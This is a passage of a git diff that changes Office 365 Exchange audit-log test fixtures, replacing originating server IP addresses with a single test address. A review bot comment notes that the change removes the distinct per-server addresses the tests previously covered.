(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -7629,12 +7629,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -7677,7 +7677,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -7689,8 +7689,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177853600Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"e9e580ee-ac04-436f-9214-08d7adfc0d8b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853484400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"e9e580ee-ac04-436f-9214-08d7adfc0d8b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json index db55863833f..f4c97d018ce 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json 
@@ -2,7 +2,7 @@ "events": [ { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (599b); warming_email_03_2017_conversation.png (614b); warming_email_03_2017_links.png (1403b); google_play_store_badge.png (4824b); apple_store_badge.png (4446b); windows_store_badge.png (3681b); warming_email_03_2017_files.png (809b); warming_email_03_2017_sharePoint.png (1432b)\",\"Id\":\"RgAAAACklF6sEsJgSK/ulVd531/WBwCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAACzgXIUnq3lQqXFeCmxHwmHAAAAABULAAAJ\",\"InternetMessageId\":\"\\u003cAM6PR01MB4535D305187FEC8127CF8EDFEE160@AM6PR01MB4535.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new SIEMTest group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (599b); warming_email_03_2017_conversation.png (614b); warming_email_03_2017_links.png (1403b); google_play_store_badge.png (4824b); apple_store_badge.png (4446b); windows_store_badge.png (3681b); warming_email_03_2017_files.png (809b); warming_email_03_2017_sharePoint.png (1432b)\",\"Id\":\"RgAAAACklF6sEsJgSK/ulVd531/WBwCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAACzgXIUnq3lQqXFeCmxHwmHAAAAABULAAAJ\",\"InternetMessageId\":\"\\u003cAM6PR01MB4535D305187FEC8127CF8EDFEE160@AM6PR01MB4535.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new SIEMTest group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", 
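Review bot: After this change all three originating servers in this fixture (`AM6PR01MB4535`, `DB3PR0102MB3500`, `DB7PR01MB4428`) carry the same address `67.43.156.13`, whereas before it two distinct addresses were present (`15.20.225.32` and `15.20.207.31`); the same applies to the hunks at -44, -86 and -128 of this file. The expected output for the Exchange admin events earlier in this diff shows `server.ip`, `destination.ip` and `related.ip` apparently being derived from the parenthesised part of `OriginatingServer`, so the fixture no longer covers the case where events from different hosts resolve to different server addresses. If the accepted test range offers more than one address, giving each server host its own address from that range (for example a neighbouring address in the same block, to be confirmed against what the test tooling supports) preserves the original distinctness at no cost.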
@@ -32,7 +32,7 @@
 "Operation": "Create",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "AM6PR01MB4535 (15.20.225.32)\n",
+ "OriginatingServer": "AM6PR01MB4535 (67.43.156.13)\n",
 "RecordType": 2,
 "ResultStatus": "Succeeded",
 "UserId": "S-1-5-18",
@@ -44,7 +44,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:46\",\"ExternalAccess\":true,\"Id\":\"c0790552-9989-4e91-cba4-08d7b386e642\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABQ7FIOAzxlR4hKCRQRbTbvBwBTdQb34omtRrZGvP+4ONQkAAAAAAEMAABTdQb34omtRrZGvP+4ONQkAAAAAA0lAAAJ\",\"InternetMessageId\":\"\\u003cDB3PR0102MB35003D203E5553CBC1B8AAEAE2160@DB3PR0102MB3500.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:46\",\"ExternalAccess\":true,\"Id\":\"c0790552-9989-4e91-cba4-08d7b386e642\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABQ7FIOAzxlR4hKCRQRbTbvBwBTdQb34omtRrZGvP+4ONQkAAAAAAEMAABTdQb34omtRrZGvP+4ONQkAAAAAA0lAAAJ\",\"InternetMessageId\":\"\\u003cDB3PR0102MB35003D203E5553CBC1B8AAEAE2160@DB3PR0102MB3500.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", 
@@ -74,7 +74,7 @@
 "Operation": "Create",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "DB3PR0102MB3500 (15.20.225.32)\n",
+ "OriginatingServer": "DB3PR0102MB3500 (67.43.156.13)\n",
 "RecordType": 2,
 "ResultStatus": "Succeeded",
 "UserId": "S-1-5-18",
@@ -86,7 +86,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:31\",\"ExternalAccess\":true,\"Id\":\"c6b58ed7-a54a-47cf-a301-08d7b386dd7c\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABkkJvTy6NaRYV8EL+vMtzZBwAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAk6unHVumCRJNhRrAMRwYLAAAAAAk9AAAJ\",\"InternetMessageId\":\"\\u003cDB7PR01MB442884FC2132AE2A909799BAFC160@DB7PR01MB4428.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (15.20.207.31)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:31\",\"ExternalAccess\":true,\"Id\":\"c6b58ed7-a54a-47cf-a301-08d7b386dd7c\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABkkJvTy6NaRYV8EL+vMtzZBwAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAk6unHVumCRJNhRrAMRwYLAAAAAAk9AAAJ\",\"InternetMessageId\":\"\\u003cDB7PR01MB442884FC2132AE2A909799BAFC160@DB7PR01MB4428.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", 
@@ -116,7 +116,7 @@
 "Operation": "Create",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "DB7PR01MB4428 (15.20.207.31)\n",
+ "OriginatingServer": "DB7PR01MB4428 (67.43.156.13)\n",
 "RecordType": 2,
 "ResultStatus": "Succeeded",
 "UserId": "S-1-5-18",
@@ -128,7 +128,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"815684be-4e52-4cb2-9242-08d7b386e333\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (15.20.225.32)\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"815684be-4e52-4cb2-9242-08d7b386e333\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, 
FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -158,7 +158,7 @@ "Operation": "ModifyFolderPermissions", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "DB3PR0102MB3500 (15.20.225.32)", + "OriginatingServer": "DB3PR0102MB3500 (67.43.156.13)", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", 
@@ -170,7 +170,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"f5b56c26-18aa-4984-822e-08d7b386d7e2\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (15.20.207.31)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"f5b56c26-18aa-4984-822e-08d7b386d7e2\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, 
FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -200,7 +200,7 @@ "Operation": "ModifyFolderPermissions", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "DB7PR01MB4428 (15.20.207.31)\n", + "OriginatingServer": "DB7PR01MB4428 (67.43.156.13)\n", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", 
@@ -212,7 +212,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"25ccad93-82ad-4742-5231-08d7b386d7e6\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, 